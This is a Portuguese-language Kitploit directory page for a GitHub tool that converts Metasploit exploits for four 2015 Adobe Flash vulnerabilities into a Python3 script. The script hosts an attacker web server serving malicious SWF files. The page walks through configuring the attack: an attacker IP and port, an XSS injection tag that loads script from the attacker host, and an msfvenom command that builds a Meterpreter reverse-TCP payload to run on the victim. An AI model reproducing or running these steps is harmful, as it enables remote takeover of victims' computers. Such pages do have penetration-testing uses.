Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Adobe-Flash-Exploits_17-18 — Exploits do Metasploit para vulnerabilidades do Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 e CVE-2015-5122 convertidos para um script Python3. | Kitploit
Ferramentas/GitHubGitHub/xattam1/adobe-flash-exploits_17-18
Frameworks de ExploraçãoGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubxattam1/adobe-flash-exploits_17-18

Adobe-Flash-Exploits_17-18

Exploits do Metasploit para vulnerabilidades do Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 e CVE-2015-5122 convertidos para um script Python3.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 4 anosAinda não revisado

Exploits Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 e CVE-2015-5122 Script Python3

Exploits do Metasploit para as vulnerabilidades do Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 e CVE-2015-5122 convertidos para um script Python3.

Informações

Este script hospedará um servidor web que pode explorar uma das seguintes vulnerabilidades do Adobe Flash por vez:

  1. CVE-2015-3090
  2. CVE-2015-3105
  3. CVE-2015-5119
  4. CVE-2015-5122

Executar

Você deve fazer alterações (descritas aqui) no exploit.py para atender às suas necessidades.

Modificações

  • hostname = "192.168.1.100"
    • Este é um IP no sistema atacante que hospedará o servidor web de exploit.
  • serverPort = 8080
    • Esta é a porta no sistema atacante que hospedará o servidor web de exploit.
  • xss = False
    • Se definido como True, a primeira requisição da vítima ao servidor é tratada como JavaScript:
      • Exemplo de injeção XSS:
        • <script src="http://192.168.1.100:8080/"></script>
      • Caminho do ataque:
        • Requisição 1 da vítima -> servidor vulnerável a XSS:
          • A vítima acessa a injeção XSS em um servidor remoto que solicita um arquivo JavaScript (veja requisição 2).
        • Requisição 2 da vítima -> fonte JavaScript no sistema atacante.
        • Requisição 3 da vítima -> arquivo swf malicioso.
    • Se definido como False, a primeira requisição da vítima ao servidor é tratada como HTML:
      • Exemplo:
        • http://192.168.1.100:8080/
      • Caminho do ataque:
        • Requisição 1 da vítima -> arquivo HTML no sistema atacante.
        • Requisição 2 da vítima -> arquivo swf malicioso.
  • base64Payload = "..."
    • Este é o payload base64 que será executado no sistema da vítima.
    • Modifique o comando de exemplo abaixo para atender às suas necessidades e gere seu payload:
      • Exemplo:
        • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64
      • Nota: O único payload que funcionou para mim foi windows/meterpreter/reverse_tcp.

  • swfFile = swfFileList['37368']
    • Selecione o arquivo swf de exploit do Adobe Flash para usar na exploração do sistema da vítima:
      • root@kitploit:~
        swfFileList = {
            '37368': 'CVE-2015-3090.swf',
            '37448': 'CVE-2015-3105.swf',
            '37523': 'CVE-2015-5119.swf',
            '37599': 'CVE-2015-5122.swf'
        }
        

Executar

Execute o seguinte comando, no mesmo diretório dos arquivos swf maliciosos, para executar o script de exploit do Adobe Flash:

  • python3 exploit.py

Referências:

CVE-2015-3090 -> https://exploit-db.com/exploits/37368

CVE-2015-3105 -> https://exploit-db.com/exploits/37448

CVE-2015-5119 -> https://exploit-db.com/exploits/37523

CVE-2015-5122 -> https://exploit-db.com/exploits/37599

Baixar ferramenta